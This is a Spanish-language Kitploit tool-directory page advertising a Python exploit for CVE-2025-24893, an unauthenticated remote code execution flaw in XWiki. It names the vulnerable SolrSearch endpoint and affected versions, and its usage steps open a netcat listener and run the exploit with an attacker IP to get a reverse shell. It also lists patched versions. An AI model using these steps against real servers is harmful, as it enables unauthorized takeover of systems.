Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-24893 — Exploit de ejecución remota de código (RCE) en XWiki | Kitploit
Herramientas/GitHubGitHub/hasecto/cve-2025-24893
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y Educación
GitHubhasecto/cve-2025-24893

CVE-2025-24893

Exploit de ejecución remota de código (RCE) en XWiki

Ver Repositorio
hace 2 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2025-24893

Exploit de Ejecución Remota de Código (RCE) en XWiki

Un exploit en Python3 para la CVE-2025-24893, una vulnerabilidad crítica de Ejecución Remota de Código No Autenticada (RCE) que afecta a la plataforma XWiki.

Este script explota una falla de Inyección de Código/Expresión (CWE-95) dentro del componente de la macro SolrSearch. La falla permite a los atacantes ejecutar código Groovy/Java arbitrario en el sistema operativo subyacente. El exploit realiza automáticamente la codificación en Base64 para evitar las limitaciones de interpretación de comandos de la función Runtime.getRuntime().exec() de Java.

📊 Detalles de la Vulnerabilidad

  • CVE ID: CVE-2025-24893
  • Puntuación CVSS: 9.8 Crítica (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
  • CWE: CWE-95 (Improper Neutralization of Expression Language Expression / Eval Injection)
  • Componente Objetivo: /bin/get/Main/SolrSearch (a través del parámetro text)

🔍 Versiones Afectadas

  • Todas las versiones desde la 5.3-milestone-2 hasta la 15.10.10
  • Versiones 16.0.0-rc-1 hasta la 16.4.0

🚀 Cómo Usar

1. Inicie su listener (Netcat) en Kali Linux:

root@kitploit:~
nc -lvnp 4444

2. Ejecute el exploit:

root@kitploit:~
python3 CVE-2025-24-893.py <URL_ALVO> <SEU_IP_VPN> <SUA_PORTA>

Ejemplo:

root@kitploit:~
python3 CVE-2025-24-893.py http://domain.local 10.10.14.229 4444

🛠️ Requisitos

  • Python 3.x
  • Biblioteca requests

Para instalar la dependencia necesaria:

root@kitploit:~
pip install requests

🛡️ Corrección

Actualice su instancia de XWiki a una de las versiones oficiales corregidas: 15.10.11, 16.4.1, 16.5.0-rc-1 (o superiores).

⚠️ Aviso Legal (Disclaimer)

Este script fue desarrollado exclusivamente para fines educativos, auditorías de seguridad autorizadas y pruebas de penetración (Pentest). El autor no se responsabiliza por cualquier uso indebido, daños o actividades ilegales causadas por esta herramienta. La utilización de este script contra objetivos sin autorización previa es estrictamente ilegal.

Descargar herramienta